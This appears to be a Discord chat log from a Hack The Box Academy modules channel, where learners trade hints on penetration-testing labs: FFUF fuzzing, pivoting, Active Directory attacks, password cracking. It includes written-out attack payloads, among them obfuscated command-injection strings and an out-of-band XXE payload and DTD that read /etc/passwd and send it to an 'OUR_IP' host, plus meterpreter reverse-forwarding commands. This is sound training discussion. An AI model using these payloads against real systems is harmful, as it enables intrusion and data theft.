#modules

ensure you have thr web_discovery.xml file

which is just a previous scan in the module

i dont have it

you doing a module?

yes

im here

if u put ./aquatone --help works

why is this happening?

you probably dont have it setup as a binary

copy it to /usr/local/bin

and see if it works as aquatone

should work

use the command

sudo cp aquatone /usr/local/bin

and then type aquatone

its not a binary and will run anywhere

this works

im not understand this

can you explain me please?

that's a different question I already have flag for that..

I need help with this question

https://academy.hackthebox.com/module/17/section/64

this works but why i put in /usr/local/bin and why run everywhere

binaries can be run anywhere in the system when executed

just how it is

and when i tipe aquatone im calling the binary that is in /usr/local/bin?

and if the file is doesnt binary this still work?

yes your calling the binary

if its not in the bin file you can only run it where its located

eg you had to use ./ in the directory it was downloaded

i understand

this works only with binaries?

not sure

Can someone help me with the module Attacking Web Applications with FFUF section VHost fuzzing?
Try running a VHost fuzzing scan on 'academy.htb', and see what other VHosts you get. What other VHosts did you get?
I already found two VHosts, but it's not accepting those...

Thank you, So when I generally try only for this subdomain. It creates a job for courses but never really finds anything. ( recursive png). When i try to check within courses, i can find some 403 not found pages when i remove filters, but that's about it. The image one is with filters (img2 png ) . Edited: Now solved

Never mind, solved it!

Feeling a bit dumb getting stuck so early, but can anyone help with the nmap enumeration medium lab?

|| I'm supposed to use --script dns-nsid, from port 53, right?||

|| sudo nmap -p139 --script dns-nsid 10.129.250.149 -D RND:9 --source-port=53 -sV --packet-trace -Pn
||

Haven't tried the -e tun0/eth0 yet

Hello, can someone please help me with the ||Harry Potter|| task in Brute Forcing Logins? I feel like I've followed every advice - username-anarchy for login, CUPP with only first name or first name + last name with 1337, numbers, symbols, set the correct hydra flags, but even after hours of trying, I still can't get the SSH pass

use CUPP like the module taught you. ||you can skip partner, child, pet, and key words||

Yeah, did that exactly. Just first name + symbols,numbers,1337 - no match for a pass. But thanks anyways

not using a good wordlist then 🙂

wait just first name? you need the last name

Tried that too, but I read from multiple people you only need the first name (also that's what it says in the hint) so I didn't finish with both first and last name. But I did let it run for about 30mins with no hits as well. As for the logins, I just use the full list from username-anarchy

I don't remember the exact creds, but use ||username-anarchy for usernames|| and ||CUPP with the above recommendations for password list. If you look back at 'Personalized Wordlists' there is something you can do to help with this||

Well, I'll keep trying :). If you mean sed, I did that to no avail. Hopefully I'll figure something out, thanks!

did you let the hydra scan finish? and use the options taught in the module?

Nevermind - for anyone having not being able to bruteforce the Service password in Login Brute Forcing for SSH - be sure to run hydra from Pwnbox, at least for me it didn't work through openvpn. Hopefully this can save someone a headache :). And thanks again, @rustic sage

need helps in command injection model😭

stuck on this

I tried base64 encode, my payload: "ip=127.0.0.1%0abase64$%09-d%09<<<%09'ZmluZCAvdXNyL3NoYXxlLwAgfCBncmVwIHJvb3QgfCBncmVwIG15c3FsIHwgdGFpbCAtbiAx"

and I also tried ip=127.0.0.1%0afi'n'd%09${PATH:0:1}usr${PATH:0:1}share${PATH:0:1}$(tr${IFS}'!-~'${IFS}'"-}'<<<'{')gr'e'p%09root, but it didnt work either, I thought may be it's the | problem

this is the question of Advanced Command Obfuscation

Keep playing with your base64

is to easy

execute the first comand only

copy the output in textfile and use the next comands whitout restrictions

somebody know how i can know the fqdn ?

Hi, in Vulnerability Assessment module, when i access to Nessun web interface i cannot access any scan.

i cannot access any report

google what "fqdn" stands for

If anyone has done the File Upload Attacks module, I could really use a hint, I'm so close !

if you are accessing your own interface after a fresh install of Nessus; yes you will need to wait for the plugins to install - this is why htb has the pivot server that allows you to run it from there

i'm accessing to nessun on htb machine in lab

because i want to access to pre loaded scan

now i can access to previus scan report. i restarted 5 times the box and now i can access

and you went to IP:8834

because they should be there

I had no issues with this when I ran it

yes... nessus had a message about inaccessible api

when i clicked on scan to view report

but now it works

tnx

Ah, yeah usually it's best to wait a few minutes before using services

idk how to make it executable...it's weird that when I ran $(base64 -d <<< ZmluZCAvdXNyL3NoYXJlLyB8IGdyZXAgcm9vdCB8IGdyZXAgbXlzcWwgfCB0YWlsIC1uIDE=) on my own terminal it throws **find: unknown predicate -n'**. And this has no response from the htbServer. When I user base64 -d <<< ZmluZCAvdXNyL3NoYXJlLyB8IGdyZXAgcm9vdCB8IGdyZXAgbXlzcWwgfCB0YWlsIC1uIDE=` directly, it return the plain text of decoded string

Hello! Any hints on why this final step on the Web Server Pivoting with Rpivot is not working??!

I have the connection already settled

Check your proxychains config file

Hint is in here; no protocol specified

How do I check the port 9050 is listening? netstat ?!

in what part of the command I add the protocol... in the notes doesn't say anything about protocol

It only says: We will configure proxychains to pivot over our local server on 127.0.0.1:9050 on our attack host, which was initially started by the Python server.

I checked and have the proxychains.conf correctly

check your proxychains.conf file
cat /etc/proxychains.conf | grep 9050

It`s already in 127.0.01 9050

Ohhh Im going to try something!

Fairly sure it explains it in the module i.e. ||bash||

can anyone help me with attacking common applications II

You can send me a DM

hey i'm playing around with database entries and curl, does anyone know a prompt do delete a list of entries at once so that just those, which aren't mentioned in the list are left in the database?

Is DMing okay?

stuck the same as you were can I dm you?

Hello! I got it but the firefox browser doesn`t open the website 😦

I think u can open firefox without proxychains and then configure the proxy with foxyproxy dont forget to put socks5

Ohhhh ok! I'm going to try that!

why socks5?

shouldn't be 4?

in case of that u used chisel u gotta put socks5

i think depending on what tunneling tool u used, could you specify the module please

Finally it worked! started all over again!

Thanks!!

Hello all. I am currently struggling with the first question on Password Attacks - Network Services. I used the provided resources for username list and password list. So far I am not getting anything for passwords. Is there a better list out there to try and use?

I don't know why I am wrong in the python 3 module:

Hi, I'd like to ask you for some help, I've been trying on my own for a long time without any results, am I missing something or is it the wrong way?

Hi baffon, try running zap hub with google chrome. Its working for me.

can dm me

I figured it out lol

Hello all
I need a hint - Footprinting Lab - Easy

first flag

Hello!

I've been trying many things but I don't know what's the matter with the cmd command in the Port Forwarding with Windows Netsh

Hi mate, tad busy today but I'll look through my notes for you definitely later

I have tried like these and with the IP of the rdp session I have... but doesnt work

Thank you so much for getting back to me, I have just finished this and your words have inspired me and I am here to express my gratitude to you

In the notes I don`t know how they manage to get the 42.198 to listen on 8080 if the command says 15.150

Maybe the command it's not properly entered... I don't get the same outlook

any ideas?!

Hello, I have an issue with "appointment". I can ping and nmap the machine. I cannot connect to its ip, however. I want to begin the sql injection. Can anyone provide ideas? Thanks

Request for Help. Module: Network Enumeration with Nmap - Firewall and IDS/IPS Evasion - Hard Lab.

Ive ran my nmap scans against the target and identified a port with a non-common port number. My problem is that I cant seem to get the service version out of the target. Any assistance would be helpful.

some bytes are ||magical||

verify your account #welcome and go to #boxes

the module discussed a trick that some services will use ||so nothing appears in nmap or that it appears as down. look into that :)||

can anyone lend a hand for attacking enterprise networks? I'm at the Active Directory Compromise module, and I'm supposed to add a fake spn and then kerberoast the user.

ServicePrincipalName Name MemberOf PasswordLastSet LastLogon Delegation

acmetesting/LEGIT ttimmons 2022-06-01 14:32:18.194423 <never>

[-] CCache file is not found. Skipping...
[proxychains] Strict chain ... 127.0.0.1:8081 ... 172.16.8.3:88 ... OK
[proxychains] Strict chain ... 127.0.0.1:8081 ... 172.16.8.3:88 ... OK
[proxychains] Strict chain ... 127.0.0.1:8081 ... 10.129.86.167:88 <--socket error or timeout!
[-] Principal: INLANEFREIGHT.LOCAL\ttimmons - [Errno Connection error (INLANEFREIGHT.LOCAL:88)] [Errno 111] Connection refused

it looks like the first 2 packets are correctly going to the dc, but the third one routes to the pivot host and fails

i've tried using sshuttle and not proxychains as well

Thx. I got it. I'd tried something similar with an incorrect option for the argument. Made literally one adjustment and got what I needed. Appreciate the help!

Hi
Can anyone help me with Footprinting Lab - medium?

I downloaded NFS shares but I'm not sure how can I change permission to each ticket. Is it good working path of this quest?

right from a domain machine

the answer was that I had a dns record for inlanefreight.local that pointed to the host ip rather than the dc. It's always dns.

@flint chasm -- some hints below 🙂

||You can just mount the NFS share with the command found in the cheat sheet. Once you mount it, you will see you don't have access... but which account on your computer might have access to everything? Use that one.

Once you have all the tickets, you will notice that is A LOT to go through to find sensitive information. How might you automate this process? Hint - ChatGPT is your friend 🙂 ||

Hi! Have you resolved your issue

I have difficulties with that part

Can anyone help me with the SQLmap essentials?

thx a lot! I use root but can't open anything

Hi, can someone give me a hint to skill assessment broken authentication. I got the password to the support.xx and then switched the cookie to admin, but I can't find the admin panel, I have used wfuzz to find directory. So I have no clue as to where the admin panel could be. Thank you for your time have a great day

How does it want me to submit multiple answers? I found ||#|| subdomains, which are ||not here|| I tried submitting the names separated by spaces, commas, commas with spaces, but it kept saying it was wrong

which module and section is this q on again?

ATTACKING WEB APPLICATIONS WITH FFUF module, Skills Assessment - Web Fuzzing section

it should be space separated

let me try again

it worked now

ty

perfect! can you remove the answer from this to avoid spoilers 🙂

Okay, ty!

Is it normal for my FFUF to average 255 req/sec? It seemed like it was much faster in the academy

yeah live internet environment is gunna be more wonky than vpn or pwnbox connection

Hey. I am currently doing the Vulnerability Assessment Module and at the OpenVAS Skills Assessment the target box (which should host the OpenVAS Web instance) is not working. Like I can connect to it via ssh fine but no OpenVAS is installed. Can anyone here help me? Am I doing something wrong ? It worked fine when I did the Nessus Skills Assessment

did you solve this?

I think what you did was correct

as far as the eye can see

did you navigate to the IP:OpenVasPort in the browser?

Yeah

sometimes it's a bit jank

so you may need to restart and wait a few minutes before trying

Tried to restart PWN box and the target

that module takes time so it's more of an oven timer - start the target then read the section

by the time you get to target you're good

Currently getting this when I try to do <ip>:8080

try https:// instead of http:// or vice versa

:)

Ah

thanks ❤️

it's similar to nessus

:D

where it doesn't autonegotiate for you

Yeah had the same problem with nessus but when I tried both http / https it was probably not loaded by then and after that I didn't think about retrying it with https again

np because for the most part the targets that have been web target either are autonegotiated OR are just http://

Keep in mind that the IP addresses you use with that command may differ in the environment when you spawn the target. Feel free to DM me if you are still stuck on that challenge.

.

@carmine kiln just a query, not sure where to ask this, loving the modules, I notice HTB have a dedicated module to hacking WordPress, are there plans for more dedicated modules for things like hacking Joomla/Drupal etc as dedicated modules? I assume the team are constantly working on new modules which are relevant

wordpress got a dedicated module because it has over half the market share for CMS. not saying it’s impossible for dedicated modules for joomla/drupal but I think priorities are elsewhere

Yeah of course, just wanting to see if that's something they consider

attacking common applications has a lot of joomla and drupal related stuff

Yeah working through that now 👍

As @rustic sage mentioned I guess WP is so large with all the plugins and themes the attack surface is huge needs more module work

Hi, I am new in HTB

I do easy Linux box, who want to collab with me?

Thanks

no, this channel is for module discussion only. read #rules and #welcome

Thanks man

Domain Admin user bross

i need help for pivoting module skills assesment, i cant seem to get the reverse portfowarding to work via meterpreter on the target m*

Can someone explain how does this works fadvieb@htb[/htbl$ cat < stdout.t×t

hello guys i have a question , where i can report something that i think is bad writing en some module ?

https://tenor.com/view/menhera-chan-chibi-menhera-angry-anime-girl-gif-24076530

I need help for the 'Linux privilege escalation module. 'Cron Job abuse''. I transferred pspy64s on the target via python-server and wget, but when I want to execute pspy there, it says:
.pspy64s: /lib/x867_64-linux-gnu/libc.so.6: version 'GLIB_2.32' not found (required by ./pspy64s)
.pspy64s: /lib/x867_64-linux-gnu/libc.so.6: version 'GLIB_2.34' not found (required by ./pspy64s)

there will be a certification with the future redteam path?

try to download an older version of pspy

Don't use the small version, download the big binary

doing pivoting module, trying to get the msfvenom payload on victim 2 (windows machine) but certutil wont work via download giving me this error, any help?

WinHTTP is this referring to internet? or some network capability to download

Hello All
I'm trying to end second lab footrprinting - medium
I got the user alex and his password, I got the important.txt also
But how can I log to the mssql?

remove -split flag and try agn

i need help for pivoting module skills assesment, i cant seem to get the reverse portfowarding to work via meterpreter on the target m*

thanks but still same error :S

a quick google gives me this reason

Error "12029" is a WinHTTP error code that indicates that a socket connection failed because encrypted communication could not be established.

something to do with HTTPS and not having a valid certificate

what command are u running on victim 1?

pivoting machine

?

ye

no command, I have tried to send the windows payload to the machine and host it to see if that would work ( I thought maybe some internal network block)

I thought the victim 2 (windows machine im pivoting too) could download from my attacker

considering I have the RDP session and portfwd up

hmm weird

when I go to internet browser on the RDP session it gives me this

I thought it looks kind of strange

have the configured settings to block this download

you have obviously done it?

this is the Meterpreter Tunneling & Port Forwarding section?

yes

i just followed the steps in the module and it worked for me

hi all
i am in the module AD enum and attacks, section Attacking Domain Trusts - Cross-Forest Trust Abuse - from Linux
i block on the last question: Log in to the ACADEMY-EA-DC03.FREIGHTLOGISTICS.LOCAL Domain Controller using the Domain Admin account password submitted for question #2 and submit the contents of the flag.txt file on the Administrator desktop.
i got the user s*****o and his password but impossible the get a shell. i tryed psexec.py FREIGHTLOGISTICS.LOCAL/sxxxxo@academy-ea-dc03.inlanefreight.local -target-ip 172.16.5.5 -k or evil-winrm but nothing work.
i get a kerberos sessions error with the psexec cmd. please if some one can help me 🙂
Have a great day

actually got it

had to use

Invoke-WebRequest -Uri "http://172.16.5.129:8001/backupscript.exe"

are you using the provided jump host?

yes

ea-attack01

and are you sure that this is the correct IP address of the requested target, e.g. DC03

not sure in fact

but i dont know how to check

the section dont give any info about an ip

crackmapexec, nmap or something else

tks in fact the ip was incorrect; a network scan give me the right one. my last question was a little bit stupid xD

thanks dpgg 🙂

Can someone explain how does this works fadvieb@htb[/htbl$ cat < stdout.t×t

i need help for pivoting module skills assesment, i cant seem to get the reverse portfowarding to work via meterpreter on the target m*

In Weak Bruteforce Protections ( Module : Broken Authentication ) I am wondering if I am using the correct cvs ( default-password.csv) with the "basic_bruteforce.py" script in the modules. I also added X-Header 127.0.0.1

nvm used burp and i realised username and pw does not matter <.<

I can see that there is a connection to port 1234 to first pivot host, i ran the reverse portfoward command to foward connections on 1234 to 8081 on my attack machine, but metasploit isnt hearing anything.

i can even see 1234 connected but no idea why its not forwarding to my attack machine

Please help XD

I`m not at home, I have my notes there! If you haven't solve it by the evening I can help you out! I'm in Spain

Hello, I`m stuck with the Port Forwarding with Windows Netsh

I assume I have the right setup but I can`t get the final xfreerdp session for user "victor

Any ideas?

I always get this response after executing the xfreerdp command

Doh! I feel so dumb..... Was trying to figure out a username and password after enumeration and tried different techniques.... In the end it was admin/admin 🤦

i cant upload screenshots here?

anyways

im a beginner at python and i have a doubt

can it be print(10 * "X") instead of print("X" * 10)?

so i figured out the times 10 after a string prints it 10 times

what if the times 10 is before the string

does exactly the same thing

okei

happens to the best of us

Based on the commands you executed, what is likely to be the operating system flavor of this instance? I am stuck on this question. I tried different answers based on typing 'uname -a' but none of my answers worked

O.o... Academy.htb down? Bad gateway..

And back 🤣

Can someone DM me about my issue? I have been working on this for a while.

nevermind...just fixed it

You probably have no reverse connection setup /or socat setup (no redirector) you'll need to either setup socat or reverse portfwd

Hi all, have a doubt in here: https://academy.hackthebox.com/module/143/section/1508 (Attacking Domain Trusts - Child -> Parent Trusts - from Linux section in Active Directory Enumeration & Attacks module ) I solved the question but want to discuss the way I did with someone who did it already. You can DM, thanks!

IS there a way to copy text from outside the spawn terminal into the spawn terminal machine of the modules

Try ctrl + shift + C and to paste the same but + V

Did it work?

Nope

I fixed it.

So when my platinum plan renews do I get an additional 1000 points?

Hi, im in the hard lab of password attacks, i got the used d#### & the password in the keepass but doesn't work, any hint please?

Hi there, I have a question about OOB XXE,
The modules says, we can create a dtd file as below:

<!ENTITY % file SYSTEM "php://filter/convert.base64-encode/resource=/etc/passwd">
<!ENTITY % oob "<!ENTITY content SYSTEM 'http://OUR_IP:8000/?content=%file;'>">

then the payload as below:

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE email [ 
  <!ENTITY % remote SYSTEM "http://OUR_IP:8000/oob_xxe.dtd">
  %remote;
  %oob;
]>
<root>&content;</root>

then we can get the /etc/passwd from the victim server but why?
According the payload, I think we will get /etc/passwd from the attack server not the victim server. Because the victim send a request "http://attack:8000/?content=php://filter/convert.base64-encode/resource=/etc/passwd"
Could any one give me some idea?
thanks!

have you gotten an answer to this yet?

hi, did you manage to do it using mimikatz? is it suppose to show cleartext password? no need for hashcat?

I think that the payload get the victim sever /etc/passwd first then put the file content by base64 encode in the content parameter. So we get the /etc/passwd which is from victim server.

basically what you are saying is correct. i would add that it is the .dtd file combined with the payload that enables this OOB XXE. its a lot easier for me personally to understand it when i go through how the victim processes the information in an XXE step by step. so in case you dont understand why the rest of the payload/.dtd file is needed outside of just the php encoding and sending /etc/passwd i would recommend that.

I want help with** Pivoting, Tunneling, and Port Forwarding** Skills Assessment. I'm trying to download a file from ||PIVOT-SRV01|| to my attack machine. Can I DM someone?

have you tried the File Transfers module?

I will do this. Thank you a lot!

hi all
i am in the module AD enum and attacks, skills Assessement P1
i got the firts clearpassword, pivoting and rdp to the second network 172.16... as sxx_xxx
i found the user txxxx and his password.
but i cant understand how to perform the attack. mimikatz doesnt work on local
and cant get a way to use secretdump in local with a proxychains
If some one can help he it will be very appreciate 🙂
Have a great day

mimikatz should work ||do a privilege::debug to verify perms or just make sure the cmd/powershell window is running as the correct user.|| another: ||other tools you can use besides mimikatz||

Request for Help. Module: Footprinting - SMB

Breezed through most of this with no issue and finally hit a wall. Im on the last question -- "What is the full system path of that specific share?" Ive enumerated the target with rpcclient and when I copy/paste the given path, I get an error about path types based on OS. Any assistance would be helpful.

Edit: Solved. Did some googling on OS syntaxes with regard to file directories.

yes the debug cmd work with return code 20 but i get ERROR_kuhl_m_lsadump_dcsync

I’ll be home later to help. my advice would be to check back at the section and make sure you’re executing the commands properly

that exactly what i am doing but i cant get what i missing ^^

give me like 30ish minutes if no one else can help by then

sure thank !

Module "Abusing HTTP Misconfigurations", Section "Premature Session Population": I think I am replicating the attack exactly as stated in documentation, but it won't work. Could someone look into this please? Thx!

dm me with the commands you’re trying

I need help on Linux Local Privilege Escalation - Skills Assessment second flag

just when I was almost done with Attacking Common Applications, 13 new sections added🫠

sorry but this question https://academy.hackthebox.com/module/19/section/103 was really stupid... how are you supposed to know you have to wait 30sec before getting the flag? I literally don't see any way you could find this without just plain luck...

can anyone tell me if there's a hint I missed?

I believe the nmap modules discusses how services will do this so that nmap cannot footprint the software and version number.

okay, but then are you supposed to read the next sections before being able to solve the question?

if that's the case then that's good to know

I don't remember exactly what section it is mentioned in

Any idea on this, pls ACTIVE DIRECTORY ENUMERATION & ATTACKS -

can you help me sir ?

bump

Yess

I need a nudge with fiinding the WinSCP credentials in module: Credential Hunting in Windows If anyone cares to help 😄

I just got done with this module. so what command did you use to set the portforward? using metasploit correct?

yea

portfwd add -R -l 8081 -p 1234 -L 10.10.14.108

like i can see the connections being made

but idk why metasploit cant catch it

did you set the payload?

yes

windows/x64/meterpreter/reverse_tcp

hold imma dm you

hi people im stuck with the Password Attacks Lab - Medium
im trying to crack the password for Docs.zip after zip2john the file , but i cat get the job donde with john, so i've tried to use hashcat but i cant find the correct mode for the zip file , i ve tried all the pkzip modes

can anyone help me ?

Can I DM you?

are you sure it's a zip file, run file docs.zip to verify. if it is a zip, make sure you didn't corrupt the file on transfer and/or recheck the commands you're executing. you could also redownload the file to be safe 🙂

what do you need help with? if you need help with file transfers that module should be more than enough

Docs.zip: Zip archive data, at least v2.0 to extract, compression method=deflate

please tell me what you're struggling with and if it requires dm we can go there

you can dm me with the command you're using to obtain the hash

ok thanks

Has anyone completed https://academy.hackthebox.com/module/191/section/2055
Log Injection first question

I haven't, but just an fyi no one memorizes the modules by number and section number. far easier if you just say the module name and section rather than sending the link

Module: Pivoting, Tunneling, and Port Forwarding
Skill Assessment FInal Question
How do I get into DC? hints?

NVm solved it

Is Academy worth it? I haven’t seen any posts or anything about success stories but I want a general consensus. Im in my 2nd year of schooling for Cybersecurity.

success stories for what

I've learned a ton from it. especially if you're a student and can take advantage of the $8/mn subscription for all content <= Tier II. The HTB certs are still fairly new so you won't see companies seeking individuals with them but some people who've taken both CPTS and OSCP say the CPTS is more realistic soooo🤷‍♂️ it's also a lot cheaper 🙂

its a learning platform not a "i got a job" thing

Thanks dude I appreciate this a lot, Just feel like I can delve deeper into things outside of school. I also appreciate the heads up on the membership price as well!

I went on a 10 year hiatus of hacking stuff and a lot of my knowledge got outdated, the academy has been pretty instrumental in catching me back up to speed. its good stuff.

also cyber security degrees still dont have much respect. The college and uni programs for em arent really refined yet and often focuses on old stuff that isnt updated fast enough

so yeah, youre absolutely going to learn more out of the classroom in this field

That’s how I’m feeling right now.. I feel like my school isn’t necessarily teaching me enough but I gotta stick it through for the paper. I appreciate you taking your time and letting me know. I’ll be trying it all out tonight.

Might be a bit late now, but its why I recommend people just go for comp sci degrees with maybe a focus in cybersecurity rather than primarily having a cybersecurity degree. Comp Sci degrees are good and you get more mileage out of it.

but having a cybersecurity degree is still going to be useful over having no degree. Just make sure youre supplementing with actually useful information, such as with academy 😉

Request for Help. Module: Footprinting - DNS
Q: What is the FQDN of the host where the last octet ends with "x.x.x.203"?

I completed a number of zone transfers and tried running a few different tools/scripts to bruteforce (using various wordlists) both the second-level domain and the subdomains but come up with nothing fruitful. Any assistance would be helpful.

How would someone go about bypassing a filter that removes "<>" from "<?php+echo+'pwned';+?>"

Have you found all the zones?
If so, start with the smallest list of SecLists. You don't want to overload the server right away.
If you can't find the host you're looking for, then take the next largest list and try that.

I think it's worth it, learned quite a lot. Stay close to this Discord server though because the people who wrote the modules are independent people from all over the world and there is a lack of logic or reasoning behind a lot of the questions

@onyx rapids Hey thanks for this, Hopefully there is no shunning for asking dumb questions cause I’m sure I’ll be full of em

The search feature will become your best friend here, it saved me many times. There was also a user with a squirrel avatar that was always helpful and seemed to know everything, but I'm not sure if they are still around

I've finished everything in the bug bounty module, but don't ask me questions because I don't want to relive the trauma of trying to figure out what the people who made the lab did

There are no stupid questions.
If you don't understand something, ask here. I am sure that you will get an answer

in my experience its mostly a failure of the student reading it than the author. Theres a couple ones I agree are truly weird but theyre far and few between.

Hello, I am working on the AD Administration: Guided Lab Part I in the Introduction to Active Directory module. I am trying to rdp into the lab box with xfreerdp, but keep getting the following errors.

[15:02:14:265] [21409:21410] [ERROR][com.freerdp.core.transport] - BIO_should_retry returned a system error 32: Broken pipe
[15:02:14:265] [21409:21410] [ERROR][com.freerdp.core] - transport_write:freerdp_set_last_error_ex ERRCONNECT_CONNECT_TRANSPORT_FAILED [0x0002000D]
[15:02:14:265] [21409:21410] [ERROR][com.freerdp.core] - freerdp_post_connect failed

have you given the target like 2-3 minutes after you have spawned it?

Yes. Im restarting my vm and changing the vpn server and am going to try again, but I have tried a few times.

Can you prove me wrong on 'HTTP ATTACKS" "Log Injection" Question 😿

I was able to complete the zone transfer for the second-level domain as well as one subdomain. Beyond that -- Im not certain if Im missing any addition (even though I tried all the others).

Remember, there are zones that allow zone transfer from everyone, others allow zone transfer only from certain servers.

If you get stuck, feel free to send me a DM

havnt done that module

DM'd

I was able to get it to work. Thank you.

Hey guys, super new to this and been running through the basics but I seem to be stuck. Im doing "Introduction to Windows Command Line" in the "Skills Assessment" question 8.... I have logged into User7 account, i used ssh to the ip address and have found the module in question but I cant seem to find the flag.... The hint says to look at the members and I have.... Not really sure where to go from here

NVM i went wayyyyy too deep in the weeds and wayyyy over thought it

I was wrong. I needed to dig deeper.

Hi all,
I'm in the Password Attacks module, Password Attacks Lab - Easy section, trying to find the root password. I've managed to get access with|| user mike via SSH|| and have tried all search scripts in the Credential Hunting in Linux section without anything noticeable sticking out. Furthermore i tried looking at the /etc/passwd and /etc/shadow files but they don't seem to have a weakness.
Can i get a hint please?

Can anyone help me with this module? https://academy.hackthebox.com/module/54/section/511

I got the first two questions correct but the third question is asking me to find a page that says "you dont have access", and I cannot manage to find this page. I am using fuzzing scans which I will paste below but I am not getting any results other than finding ||a /courses folder|| and ||index.php pages||. Here is the command I ran:
||ffuf -w /opt/SecLists/Discovery/Web-Content/directory-list-2.3-small.txt:FUZZ -u http://test.academy.htb:30261/FUZZ --recursion -e .php -v||

I also replaced ||test.academy.htb|| with the following and ran the same command:
||academy.htb||
||archive.academy.htb||
||faculty.academy.htb||
But I was not able to get anything. I was getting the index pages returned so I know the command worked, but nothing other than index pages and a ||/course|| folder.

hello i have problem to connect to xfreerdp server for module (Packet Inception, Dissecting Network Traffic With Wireshark) i have this when i try to connect (login failed for display 0) any solution thanks .

I got this hint as well:
||Use 'PORT' instead of the port shown above, like http://xxxxx.academy.htb:PORT/xxxxxxx ..etc|| but I did exactly what it said ||(replacing the port number with PORT )||but the scan did not work at all

you dont literally replace it with the word PORT

what do i replace it with?

I always have the actual port there but im not finding anything useful

it would indeed be the port of the spawned instance

Can you think of something else im doing wrong? I cant find any pages other than index

rest of post is here

youre ruling out extensions other than just .php

I did an extension scan and I only got .php .phps and .php7

I tried php7 before and got nothing useful'

i tried phps and it turns out its just the backend stuff so nothing useful

you sure you got nothing useful

sounds like you overlooked some stuff

Well im asking to some hints on what I overlooked

that's challenging without giving away the answer

but if youve checked the things you said you checked then you had the desired result already and dismissed it. So review the stuff you dismissed too early.

can you atleast give me a subdomain i need to check?

if you're talking about the /courses part i set it on recursive so it checks that part too

no, its a skill assessment

can anyone help with this module? https://academy.hackthebox.com/module/113/section/2166

Be more descriptive

https://dontasktoask.com

yes but its still to help me learn and im not learning if im stuck doing the same thing over and over

not knowing what i did wrong

Reread the modules and keep trying :)

sorry my dude but its a skill assessment, its a test.

you need to review your results closer

I do not see the button to start the machine, I was told that to answer the question of this module, I should use the machine of the previous module, which is a windows machine, but the vulnerability in question seems not to be relevant for windows, only for linux

i get that but its annoying with having to wait 15 minutes to fuzz a subdomain each time im wrong

just a waste of time

I dont think your fuzzing itself is wrong, I think youre literally overlooking your results

feel free to dm your fuzz results for each domain

It also helps to give module name instead of just the link

Attacking Common Gateway Interface (CGI) Applications - Shellshock

I apologize for the trouble I was really frustrated. I found the answers now, the recursion depth was the issue

ye I see how that mightve done it

can anyone help me with the command injection web skill assessment?

I think it passes the filter but im not sure why im not getting any results...

@tough fjord I need help , my university domain isn't in HTB valid academic Domian

contact support via the academy website

anyone do the new thick client stuff

and having trouble submitting the uname as the answer?

anyone there

#welcome #rules

thjank you

Hi can anyone help me with this module? https://academy.hackthebox.com/module/18/section/80

I'm struggling on the third question: " Use cURL from your Pwnbox (not the target machine) to obtain the source code of the "https://www.inlanefreight.com" website and filter all unique paths of that domain. Submit the number of these paths as the answer. "

I have already tried multiple commands several times and still get the error "0curl: (6) Could not resolve host: www.inlanefreight.com"

Just starting out, would appreciate the help!

you need to add the domain to your /etc/hosts

OH

okay

lemme try that

I'm on the Attacking DNS section of Attacking Common Services. The hint says to use subbrute. No matter how I try to run it. I get the same error. zsh: no such file or directory ./subbrute. Has anyone seen that before? I installed it from github just like it says to in the module.

looks like youre either not in the directory for subbrute or didnt follow whatever installation instructions it may have had

I'm in the subbrute directory and I installed it on my Kali VM just as it specifies. I'm not sure what I could be doing wrong.

whats in that directory. ls -la

dnslib, .git, LICENSE, names_small.txt, names.txt README.md, resolvers.txt, subbrute.py, windows, windows_setup.py.

Does that look right?

looks like you have a subbrute.py file instead of a subbrute bin

so either chmod +x and then running ./subbrute.py or call it with python python3 ./subbrute.py

Okay, I'll try that. Thank you.

@thorn urchin That looks to be working now. Thank you!

np

Now, I'm just getting errors when it runs. I'll try it in the pwnbox.

Nope, same errors in the pwnbox.

You can refer to password spraying in windows section.

Please refer to internal password spraying in windows section

no hit? 😦

Maybe you should be doing some manual checks?? That one is hard to give a hint to without giving away the answer, but sometimes people type stuff in the terminal that they shouldn't.

General Mills - Hackathon 2023 access key is what ?

thx... i sloved

Did you ever finish this? I'm kind of lost. Trying to trigger the basic XSS Alert(1) payload, but it won't work, just displays the code back to me

has anyone here completed the password attacks module?

Was Attacking Common Applications just updated????

I was going to start cpts exam tomorrow, but now I have not completed this module. I really thought I did them all.

I am trying to do it now, but the section: Attacking Common Gateway Interface (CGI) Applications - Shellshock is asking me to attack the target... but there is no target to spawn

the Attacking Common Applications module just got 11 new sections today...

hello, I am in the DNS sub section of footprinting module 2. I would like to know if, for the last question (FQDN of ...*.203), editing the host file is necessary?

for pivoting module skills assessment is anyone else running into issues with rdp into m* user?

forcing myself to use tmux, i miss the mouse wheel tho

No, why would that be necessary?
You want to find out the IP of a host.

The hosts file is actually a relic from the old days. To resolve a domain to an IP, your PC first looks into its cache, then into the Hosts file. If it doesn't find an IP, then it queries the configured resolver.

to any future people using pwnbox to do the oracle TNS exercise (the newly added one). you'll get an error when you run sqlplus which is sqlplus: error while loading shared libraries: libsqlplus.so: cannot open shared object file: No such file or directory. you fix this by: $export LD_LIBRARY_PATH=/usr/lib/oracle/19.6/client64/lib/ . you're welcome future ppl...

hi @acoustic owl , im a few days off sitting the exam, i've noticed in discussions re offshore that many people used some sort of c2 (covenant mostly). did you use one for the exam?

any discussion about tactics used for the exam afaik are not allowed :)

at least definitely not publicly on the HTB discord :^)

I only used tools that was discussed in the Academy in the modules.

ok awesome

am i allowed to ask if you used any command prompt logging for easier reporting?

ill take not because it wasnt discussed in the academy 😛

im looking forward to having the spare time to do it. failure on first attempt almost assured but i cant wait

You can use any tool you want
https://www.youtube.com/live/wwmCHeYd1I4?feature=share&t=6403

this is literally in the documentation and reporting module 🙂

Roger that

specifically it covers using tmux for logging

Yes, I've started using tmux for this reason, makes sense

I was more asking for personal opinions/experiences

Not necessarily in context of exam (I understand this is not allowed)

module ATTACKING COMMON APPLICATIONS section Attacking Thick Client Applications
error when executing RestartOracle-Service.exe. i followed the section

good morning

im trying to upload a shell in php page and i have a issue

Which module?

FILE UPLOAD ATTACKS
Page 5
Blacklist Filters
Blacklist Filters

You need to find a suitable file extension.

how can i send some burp atacks?

Try it with the Intruder

No, but i was busy to try it again. I can trigger the XSS but it seems that the admin bot never visit it

e.g:

(other methods doesn't seem to work too)

Hey Guys

you are missing a parameter in your command

additionally, you must have assured yourself that you can write files in your current working directory

bump

thanks, did it. To run mimikatz, I have to pass the .ps1 file? Cause I can't ran it on the target machine..

up to you to find out

